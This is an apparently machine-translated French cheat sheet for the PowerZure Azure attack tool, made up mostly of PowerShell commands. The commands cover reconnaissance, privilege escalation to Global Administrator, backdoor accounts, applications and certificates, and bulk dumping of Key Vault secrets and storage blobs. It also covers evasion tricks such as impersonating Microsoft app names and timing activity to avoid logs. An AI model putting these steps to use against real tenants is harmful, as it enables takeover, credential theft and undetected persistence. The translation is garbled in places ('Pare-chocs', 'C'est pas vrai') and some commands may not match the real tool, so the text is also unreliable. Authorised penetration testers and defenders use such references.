PowerZure Azure outil d'évaluation de sécurité Cheat Sheet
Aperçu général
PowerZure est une puissance Projet Shell créé par Ryan Hausknecht (@haus3c) pour évaluer la sécurité Azure. Il fournit un ensemble complet de fonctions pour la reconnaissance Azure, l'escalade des privilèges, la persistance et l'exfiltration de données dans les environnements Azure.
C'est pas vrai. Attention : Cet outil est destiné uniquement aux tests de pénétration et aux évaluations de sécurité autorisés. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser dans tout environnement.
Installation
Installation de la galerie PowerShell
# Install from PowerShell Gallery
Install-Module -Name PowerZure
# Install for current user only
Install-Module -Name PowerZure -Scope CurrentUser
# Update existing installation
Update-Module -Name PowerZure
# Import module
Import-Module PowerZure
Installation manuelle
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/hausec/PowerZure/archive/master.zip" -OutFile "PowerZure.zip"
Expand-Archive -Path "PowerZure.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\PowerZure-master\PowerZure.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
```_
### Installation Git
```bash
# Clone repository
git clone https://github.com/hausec/PowerZure.git
cd PowerZure
# Import in PowerShell
Import-Module .\PowerZure.psd1
```_
## Utilisation de base
### Configuration du module
```powershell
# Import PowerZure
Import-Module PowerZure
# Get available commands
Get-Command -Module PowerZure
# Get help for specific function
Get-Help Invoke-AzureRecon -Full
# Check module version
Get-Module PowerZure
Authentification
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
# Managed identity authentication (from Azure VM)
Connect-AzAccount -Identity
Référence de commande
Fonctions de reconnaissance
| Function | Description |
|---|---|
Invoke-AzureRecon |
Comprehensive Azure reconnaissance |
Get-AzureTargets |
Identify potential targets |
Get-AzureUsers |
Enumerate Azure AD users |
Get-AzureGroups |
Enumerate Azure AD groups |
Get-AzureApps |
Enumerate applications |
Get-AzureResources |
Enumerate Azure resources |
Fonctions d'escalade des privilèges
| Function | Description |
|---|---|
Invoke-AzurePrivEsc |
Automated privilege escalation |
Get-AzureRoleAssignments |
Check role assignments |
Set-AzureRole |
Assign roles to principals |
Get-AzureKeyVaults |
Enumerate Key Vaults |
Get-AzureVMs |
Enumerate virtual machines |
Fonctions de persistance
| Function | Description |
|---|---|
New-AzureBackdoor |
Create backdoor accounts |
Set-AzureUserPassword |
Change user passwords |
New-AzureApplication |
Create malicious applications |
Add-AzureKeyVaultSecret |
Add secrets to Key Vault |
Reconnaissance et collecte d'information
Reconnaissance globale
# Run full reconnaissance
Invoke-AzureRecon
# Reconnaissance with specific subscription
Invoke-AzureRecon -SubscriptionId "subscription-id"
# Save reconnaissance results
Invoke-AzureRecon|Out-File "azure_recon.txt"
# Reconnaissance with verbose output
Invoke-AzureRecon -Verbose
Énumération des utilisateurs et des groupes
# Get all Azure AD users
$users = Get-AzureUsers
# Get users with specific role
$adminUsers = Get-AzureUsers|Where-Object \\\\{$_.AssignedRoles -contains "Global Administrator"\\\\}
# Get all groups
$groups = Get-AzureGroups
# Get group members
$groupMembers = Get-AzureGroupMembers -GroupId "group-id"
# Get privileged groups
$privilegedGroups = Get-AzureGroups|Where-Object \\\\{$_.DisplayName -like "*admin*"\\\\}
Nombre de demandes et de services
# Get all applications
$apps = Get-AzureApps
# Get applications with high privileges
$highPrivApps = Get-AzureApps|Where-Object \\\\{$_.RequiredResourceAccess.ResourceAppId -contains "00000003-0000-0000-c000-000000000000"\\\\}
# Get service principals
$servicePrincipals = Get-AzureServicePrincipals
# Get application secrets and certificates
$appSecrets = Get-AzureAppSecrets -ApplicationId "app-id"
Recensement des ressources
# Get all Azure resources
$resources = Get-AzureResources
# Get virtual machines
$vms = Get-AzureVMs
# Get storage accounts
$storageAccounts = Get-AzureStorageAccounts
# Get Key Vaults
$keyVaults = Get-AzureKeyVaults
# Get SQL databases
$sqlDatabases = Get-AzureSQLDatabases
Abonnement et renseignements sur le locataire
# Get tenant information
$tenantInfo = Get-AzureTenantInfo
# Get subscription information
$subscriptions = Get-AzureSubscriptions
# Get current context
$context = Get-AzContext
# Get role assignments
$roleAssignments = Get-AzureRoleAssignments
Escalade des privilèges
Escalade automatique des privilèges
# Run automated privilege escalation
Invoke-AzurePrivEsc
# Privilege escalation with specific target
Invoke-AzurePrivEsc -Target "subscription-id"
# Check for privilege escalation paths
Get-AzurePrivEscPaths
# Test specific privilege escalation technique
Test-AzurePrivEsc -Technique "RoleAssignment"
L'escalade des privilèges fondée sur le rôle
# Check current role assignments
$currentRoles = Get-AzRoleAssignment
# Assign Global Administrator role
Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Global Administrator"
# Assign Contributor role to subscription
Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Contributor" -Scope "/subscriptions/subscription-id"
# Create custom role with high privileges
$customRole = New-AzureCustomRole -Name "CustomAdmin" -Permissions @("*")
Escalade du privilège de la faille clé
# Check Key Vault access
$keyVaultAccess = Test-AzureKeyVaultAccess -VaultName "vault-name"
# Get Key Vault secrets
$secrets = Get-AzureKeyVaultSecrets -VaultName "vault-name"
# Extract credentials from Key Vault
$credentials = Get-AzureKeyVaultCredentials -VaultName "vault-name"
# Add malicious secret to Key Vault
Add-AzureKeyVaultSecret -VaultName "vault-name" -SecretName "backdoor" -SecretValue "password123"
Virtual Machine Privilege Escalation
# Check VM access
$vmAccess = Test-AzureVMAccess -VMName "vm-name"
# Execute commands on VM
Invoke-AzureVMCommand -VMName "vm-name" -Command "whoami"
# Get VM credentials
$vmCreds = Get-AzureVMCredentials -VMName "vm-name"
# Install backdoor on VM
Install-AzureVMBackdoor -VMName "vm-name"
Techniques de persistance
Persistance du compte utilisateur
# Create backdoor user
New-AzureBackdoor -Username "service-account" -Password "ComplexPassword123"
# Change existing user password
Set-AzureUserPassword -UserPrincipalName "user@domain.com" -Password "NewPassword123"
# Add user to privileged group
Add-AzureUserToGroup -UserPrincipalName "user@domain.com" -GroupId "admin-group-id"
# Assign privileged role to user
Set-AzureRole -PrincipalId "user-id" -RoleDefinitionName "Global Administrator"
Persistance fondée sur l'application
# Create malicious application
$app = New-AzureApplication -DisplayName "LegitimateApp" -RequiredResourceAccess $permissions
# Add application secret
$secret = New-AzureApplicationSecret -ApplicationId $app.AppId
# Grant application permissions
Grant-AzureApplicationPermissions -ApplicationId $app.AppId -Permissions @("User.Read.All", "Directory.Read.All")
# Create service principal for application
$sp = New-AzureServicePrincipal -ApplicationId $app.AppId
Persistance fondée sur le certificat
# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My"
# Add certificate to application
Add-AzureApplicationCertificate -ApplicationId "app-id" -Certificate $cert
# Use certificate for authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint $cert.Thumbprint -ApplicationId "app-id" -TenantId "tenant-id"
Persistance fondée sur les ressources
# Create backdoor storage account
$storageAccount = New-AzureStorageAccount -Name "backdoorstorage" -ResourceGroupName "rg-name"
# Create backdoor Key Vault
$keyVault = New-AzureKeyVault -Name "backdoorvault" -ResourceGroupName "rg-name"
# Create backdoor virtual machine
$vm = New-AzureVM -Name "backdoorvm" -ResourceGroupName "rg-name" -Credential $cred
Exfiltration des données
Azure AD Exfiltration des données
# Export all users
$users = Get-AzureUsers
$users|Export-Csv -Path "azure_users.csv" -NoTypeInformation
# Export group memberships
$groups = Get-AzureGroups
foreach ($group in $groups) \\\\{
$members = Get-AzureGroupMembers -GroupId $group.Id
$group|Add-Member -NotePropertyName "Members" -NotePropertyValue $members
\\\\}
$groups|ConvertTo-Json -Depth 3|Out-File "azure_groups.json"
# Export application information
$apps = Get-AzureApps
$apps|Export-Csv -Path "azure_applications.csv" -NoTypeInformation
Exfiltration des données du compte de stockage
# List storage accounts
$storageAccounts = Get-AzureStorageAccounts
# Download blobs from storage account
foreach ($account in $storageAccounts) \\\\{
$ctx = New-AzStorageContext -StorageAccountName $account.Name -UseConnectedAccount
$containers = Get-AzStorageContainer -Context $ctx
foreach ($container in $containers) \\\\{
$blobs = Get-AzStorageBlob -Container $container.Name -Context $ctx
foreach ($blob in $blobs) \\\\{
Get-AzStorageBlobContent -Blob $blob.Name -Container $container.Name -Context $ctx -Destination ".\downloads\"
\\\\}
\\\\}
\\\\}
Pare-chocs Exfiltration des données
# Extract all Key Vault secrets
$keyVaults = Get-AzureKeyVaults
foreach ($vault in $keyVaults) \\\\{
try \\\\{
$secrets = Get-AzKeyVaultSecret -VaultName $vault.Name
foreach ($secret in $secrets) \\\\{
$secretValue = Get-AzKeyVaultSecret -VaultName $vault.Name -Name $secret.Name -AsPlainText
Write-Output "Vault: $($vault.Name), Secret: $($secret.Name), Value: $secretValue"
\\\\}
\\\\}
catch \\\\{
Write-Warning "Cannot access vault: $($vault.Name)"
\\\\}
\\\\}
Exfiltration des données de base de données
# Extract SQL database information
$sqlServers = Get-AzSqlServer
foreach ($server in $sqlServers) \\\\{
$databases = Get-AzSqlDatabase -ServerName $server.ServerName -ResourceGroupName $server.ResourceGroupName
foreach ($database in $databases) \\\\{
# Attempt to connect and extract data
try \\\\{
$connectionString = "Server=$($server.FullyQualifiedDomainName);Database=$($database.DatabaseName);Integrated Security=true;"
# Use connection string to extract data
\\\\}
catch \\\\{
Write-Warning "Cannot access database: $($database.DatabaseName)"
\\\\}
\\\\}
\\\\}
Techniques d'attaque avancées
Manipulation des jetons
# Get current access token
$token = [Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.Account, $context.Environment, $context.Tenant.Id, $null, "https://management.azure.com/", $null).AccessToken
# Parse JWT token
$tokenParts = $token.Split('.')
$header = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[0]))
$payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($tokenParts[1]))
# Use token for API calls
$headers = @\\\\{
'Authorization' = "Bearer $token"
'Content-Type' = 'application/json'
\\\\}
Attaques croisées
# Enumerate accessible tenants
$tenants = Get-AzTenant
# Switch between tenants
foreach ($tenant in $tenants) \\\\{
Set-AzContext -TenantId $tenant.Id
Write-Output "Current tenant: $($tenant.Id)"
# Perform reconnaissance in each tenant
Invoke-AzureRecon
\\\\}
Prise en charge des groupes de ressources
# Find resource groups with weak permissions
$resourceGroups = Get-AzResourceGroup
foreach ($rg in $resourceGroups) \\\\{
$roleAssignments = Get-AzRoleAssignment -Scope $rg.ResourceId
# Check for overprivileged assignments
$dangerousRoles = $roleAssignments|Where-Object \\\\{$_.RoleDefinitionName -in @("Owner", "Contributor", "User Access Administrator")\\\\}
if ($dangerousRoles) \\\\{
Write-Output "Potentially exploitable resource group: $($rg.ResourceGroupName)"
\\\\}
\\\\}
Techniques d'évacuation
Opérations de vol
# Use legitimate application names
$stealthApp = New-AzureApplication -DisplayName "Microsoft Graph PowerShell"
# Mimic legitimate service accounts
$stealthUser = New-AzureUser -UserPrincipalName "sync-service@company.com" -DisplayName "Directory Sync Service"
# Use existing application IDs
$graphAppId = "14d82eec-204b-4c2f-b7e8-296a70dab67e" # Microsoft Graph PowerShell
Taux limitant l'évacuation
# Implement delays between operations
function Invoke-AzureOperationWithDelay \\\\{
param($Operation, $Delay = 2)
& $Operation
Start-Sleep -Seconds $Delay
\\\\}
# Randomize operation timing
$users = Get-AzureUsers
foreach ($user in $users) \\\\{
$delay = Get-Random -Minimum 1 -Maximum 5
Start-Sleep -Seconds $delay
$groups = Get-AzureUserGroups -UserId $user.Id
\\\\}
Évasion du journal
# Perform operations during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) \\\\{
# Perform stealthy operations
Invoke-AzureRecon
\\\\}
# Use service principal instead of user account
Connect-AzAccount -ServicePrincipal -Credential $spCredential -TenantId $tenantId
Automatisation et écriture
Script d'évaluation automatisé
# Comprehensive Azure security assessment
param(
[string]$TenantId,
[string]$SubscriptionId,
[string]$OutputPath = ".\azure_assessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null
# Authenticate
Connect-AzAccount -TenantId $TenantId
# Set subscription context
if ($SubscriptionId) \\\\{
Set-AzContext -SubscriptionId $SubscriptionId
\\\\}
# Perform reconnaissance
Write-Host "Performing reconnaissance..."
$recon = Invoke-AzureRecon
$recon|Out-File "$OutputPath\reconnaissance.txt"
# Check for privilege escalation opportunities
Write-Host "Checking privilege escalation paths..."
$privesc = Invoke-AzurePrivEsc
$privesc|Out-File "$OutputPath\privilege_escalation.txt"
# Export user and group information
Write-Host "Exporting user and group data..."
$users = Get-AzureUsers
$users|Export-Csv "$OutputPath\users.csv" -NoTypeInformation
$groups = Get-AzureGroups
$groups|Export-Csv "$OutputPath\groups.csv" -NoTypeInformation
# Export application information
Write-Host "Exporting application data..."
$apps = Get-AzureApps
$apps|Export-Csv "$OutputPath\applications.csv" -NoTypeInformation
# Generate summary report
$summary = @\\\\{
AssessmentDate = Get-Date
TenantId = $TenantId
SubscriptionId = $SubscriptionId
TotalUsers = $users.Count
TotalGroups = $groups.Count
TotalApplications = $apps.Count
PrivilegeEscalationPaths = $privesc.Count
\\\\}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Scénario de surveillance continue
# Continuous Azure monitoring script
param(
[int]$IntervalMinutes = 60,
[string]$LogPath = ".\azure_monitoring.log"
)
while ($true) \\\\{
$timestamp = Get-Date
Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new users
$newUsers = Get-AzureUsers|Where-Object \\\\{$_.CreatedDateTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newUsers) \\\\{
Write-Output "[$timestamp] New users detected: $($newUsers.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new applications
$newApps = Get-AzureApps|Where-Object \\\\{$_.CreatedDateTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newApps) \\\\{
Write-Output "[$timestamp] New applications detected: $($newApps.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for role assignments
$recentRoleAssignments = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($recentRoleAssignments) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($recentRoleAssignments.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\\\}
Dépannage
Questions d'authentification
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) \\\\{
Write-Error "Not authenticated to Azure"
Connect-AzAccount
\\\\}
# Verify permissions
$currentUser = Get-AzADUser -UserPrincipalName (Get-AzContext).Account.Id
$roleAssignments = Get-AzRoleAssignment -ObjectId $currentUser.Id
Questions liées au module
# Check PowerZure installation
Get-Module PowerZure -ListAvailable
# Update PowerZure
Update-Module PowerZure -Force
# Reinstall if necessary
Uninstall-Module PowerZure
Install-Module PowerZure -Force
Questions relatives à la permission
# Check current permissions
$permissions = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
# Test specific permissions
try \\\\{
Get-AzADUser -First 1
Write-Output "User read permission: OK"
\\\\}
catch \\\\{
Write-Output "User read permission: DENIED"
\\\\}
# Request additional permissions
Write-Output "Required permissions:"
Write-Output "- Directory.Read.All"
Write-Output "- User.Read.All"
Write-Output "- Application.Read.All"
Intégration avec d'autres outils
Intégration de BloodHound
# Export data for BloodHound
$users = Get-AzureUsers
$groups = Get-AzureGroups
$apps = Get-AzureApps
# Convert to BloodHound format
$bloodhoundData = @\\\\{
users = $users|ForEach-Object \\\\{
@\\\\{
ObjectIdentifier = $_.Id
Properties = @\\\\{
name = $_.UserPrincipalName
displayname = $_.DisplayName
enabled = $_.AccountEnabled
\\\\}
\\\\}
\\\\}
groups = $groups|ForEach-Object \\\\{
@\\\\{
ObjectIdentifier = $_.Id
Properties = @\\\\{
name = $_.DisplayName
description = $_.Description
\\\\}
\\\\}
\\\\}
\\\\}
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Intégration de ROADtools
# Export data for ROADtools
$azureData = @\\\\{
users = Get-AzureUsers
groups = Get-AzureGroups
applications = Get-AzureApps
servicePrincipals = Get-AzureServicePrincipals
\\\\}
$azureData|ConvertTo-Json -Depth 3|Out-File "azure_roadtools.json"
Ressources
- [Répertoire PowerZure GitHub] (LINK_5)
- [Blogue Ryan Hausknecht] (LINK_5)
- [Documentation de sécurité de l'Azure] (LINK_5)
- [Meilleures pratiques en matière de sécurité de la DA d'Azure] (LINK_5)
- [Documentation Azure PowerShell] (LINK_5)
*Cette feuille de triche fournit une référence complète pour l'utilisation de PowerZure. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer des évaluations de sécurité Azure. *